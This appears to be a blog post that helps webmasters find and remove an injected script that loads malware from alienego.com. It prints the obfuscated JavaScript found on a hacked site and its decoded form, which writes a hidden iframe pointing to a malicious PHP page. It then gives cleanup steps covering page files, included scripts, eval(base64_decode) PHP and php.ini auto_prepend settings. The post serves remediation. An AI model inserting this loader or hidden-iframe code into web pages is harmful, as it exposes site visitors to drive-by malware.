Malicious software is hosted on 1 domain(s), including alienego.com/.
Here are a couple of things to look for.
Typically with alienego.com the hack consists of some obfuscated JavaScript that appears either at the very beginning of the page, before the doctype declaration or <html> tag or, at the end of the file after the </html> tag, and on occasion right after the <body> tag. It may also appear in the JavaScript files of the site. This is an example of the code found on one site.
< !-- ad -- > < sc ript > el=document.createElement("div");el.innerHTML="ReferenceErr";try{try{throw 1}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,? 0);};ar="seTr > 'm}0 < ECB)c,? Ald]t i1yg{:;\"anupbf.vN/w h9=[o(";ar2="R84c84c88c140c164c188c72c184c56c128c24c4c124c80c144c100c4c80c40c68c4c24c4c124c80c0c48c96c8c120c100c152c120c24c4c188c20c136c184c72c96c20c52c180c32c76c52c104c84c84c84c88c140c12c120c24c4c12c188c52c112c84c84c28c164c4c68c0c4c164c104c84c84c84c72c184c56c128c24c4c124c80c144c160c12c88c80c4c188c116c36c88c140c12c120c24c4c164c0c12c56c176c20c168c80c80c132c108c156c156c120c68c88c4c124c4c100c184c144c56c184c24c156c120c72c148c156c4c100c184c156c140c24c56c128c4c160c4c124c172c144c132c168c132c20c164c160c88c72c80c168c176c20c92c32c20c164c168c4c88c100c168c80c176c20c92c32c20c164c0c80c96c68c4c176c20c148c88c0c88c136c88c68c88c80c96c108c168c88c72c72c4c124c112c132c184c0c88c80c88c184c124c108c120c136c0c184c68c128c80c4c112c68c4c140c80c108c32c112c80c184c132c108c32c112c20c16c36c156c88c140c12c120c24c4c16c116c52c112c84c84c28c84c84c140c128c124c56c80c88c184c124c164c88c140c12c120c24c4c12c188c52c104c84c84c84c148c120c12c164c140c164c176c164c72c184c56c128c24c4c124c80c144c56c12c4c120c80c4c40c68c4c24c4c124c80c188c20c88c140c12c120c24c4c20c52c112c140c144c0c4c80c64c80c80c12c88c136c128c80c4c188c20c0c12c56c20c60c20c168c80c80c132c108c156c156c120c68c88c4c124c4c100c184c144c56c184c24c156c120c72c148c156c4c100c184c156c140c24c56c128c4c160c4c124c172c144c132c168c132c20c52c112c140c144c0c80c96c68c4c144c148c88c0c88c136c88c68c88c80c96c176c20c168c88c72c72c4c124c20c112c140c144c0c80c96c68c4c144c132c184c0c88c80c88c184c124c176c20c120c136c0c184c68c128c80c4c20c112c140c144c0c80c96c68c4c144c68c4c140c80c176c20c32c20c112c140c144c0c80c96c68c4c144c80c184c132c176c20c32c20c112c140c144c0c4c80c64c80c80c12c88c136c128c80c4c188c20c160c88c72c80c168c20c60c20c92c32c20c52c112c140c144c0c4c80c64c80c80c12c88c136c128c80c4c188c20c168c4c88c100c168c80c20c60c20c92c32c20c52c112c84c84c84c72c184c56c128c24c4c124c80c144c100c4c80c40c68c4c24c4c124c80c0c48c96c8c120c100c152c120c24c4c188c20c136c184c72c96c20c52c180c32c76c144c120c132c132c4c124c72c44c168c88c68c72c188c140c52c112c84c84c28";pau="urn eReferenceErr".re?place(k,? "val");e=Function("ret"+pau)();ar2=ar2.split("c");ar2[0]="84";s="";for(i=0;i!=ar2.length;i++){e('po'.concat('s=par',? 'seInt(k',? '.rep',? 'lace("R',? 'eferen',? '",? "0a',? 'sd"))+',? 'ar2[',? 'i]/',? '4'));e('s+=ar.substr(pos,? 1)');}
2: e(s); < / sc ript > < !-- /ad -- >
If you evaluate the obfuscated JavaScript you get something like this, the code writes a hidden iframe that loads malicious content from alienego.com.
if (document.getElementsByTagName('body')[0]){
iframer();
}
else {
document.write("
<iframe src='http://alienego.com/adv/ego/fmcuewen9.php' width='10' height='10' style='visi
bility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src', 'http://alienego.com/adv/ego/fmcuewen9.php');
f.style.visibility = 'hidden';
f.style.position = 'absolute';
f.style.left = '0';
f.style.top = '0';
f.setAttribute('width', '10');
f.setAttribute('height', '10');
document.getElementsByTagName('body')[0].appendChild(f);
}
In this site the code had been inserted in most of the site's static html pages before the Doctype declaration. There are some variations to the code, on some sites you will see this line
el.innerHTML="Referenc
eErr"
instead of this one
el.innerHTML="ReferenceErr";
Start by checking your site's web pages. If Google has flagged your site they will sometimes provide the URLs of some of the pages that contain the code so check your Webmaster Tools account for any information. To check the pages I suggest you use an online tool like Redleg's File Viewer. Using an online tool provides a somewhat safer way to check the files and offers the advantage of displaying the content that is being sent to a user's browser. This is particularly useful with dynamic pages such as php pages.
If the malicious code is not showing in the File Viewer you should check any included JavaScript files next. External Javascript files are normally included using a line of code that will look like this using the File Viewer.
< script language≈ "JavaScript" type≈ "text/javascript" src≈ "/shared/pe.js" > < / script >
The path and filename will be in the src value. Open the file in your editor and check for any blocks of code similar to the example above. Frequently when you get JavaScript from a 3rd party it will be "packed" making it difficult to understand and check. With packed JavaScript files it is often easier to replace them with a known clean copy then to try and clean them up. If you do not have a clean copy you would likely be able to get a new clean copy from the original source of the code.
If editing the file is your only option you should first make a copy of the file and then make any changes to the original file and check to see that your page still works correctly and you are not getting any JavaScript errors. You can always restore the file from the back-up and try again if there are problems.
Once you have identified the malicious page(s) open the files in your editor and take a look at the contents. Some editors will not display code outside of the <html> tags unless you are in the "edit html" mode. With php pages it is very common for hackers to use obfuscated php code to write the obfuscated JavaScript code. These are typically lines of php code that start out eval(base64_decode(' then a long string of seemingly random characters. Hopefully the malicious JavaScript or php code will be visible and it will just be a matter of deleting the code, saving the file and moving on.
If you do not see the code in the source code of your pages you will need to do some more looking, hackers use a number of methods to insert malicious code in a page. You will need to check any external JavaScript files being used in the page, again open the files in your editor and check for code similar to the example above.
There are a couple of common techniques hackers use to insert code into a file at run-time. For sites running on Apache a hack of the .htaccess is often used. There are some tips on checking the .htaccess file here.
With php sites it is common to hack the php configuration file php.ini. Open the php.ini file an look for these configuration lines
; Automatically add files before PHP document.
; http://php.net/auto-prepend-file
auto_prepend_file =
; Automatically add files after PHP document.
; http:// php . net /auto-append-file
auto_append_file =
If the lines auto_prepend_file = or auto_append_file = contain /path/file names, auto_append_file = /dir/filename.php locate that file(s) and check the contents of the file(s) for the malicious code, either the javascript or obfuscated php code. If the files do not contain any legitimate code you can just remove the path/filename from the php.ini file and the delete the prepended/appended file. If the file contains legitimate content then you will need to clean up the file by deleting the malicious code.
Good Luck!
0 comments:
Post a Comment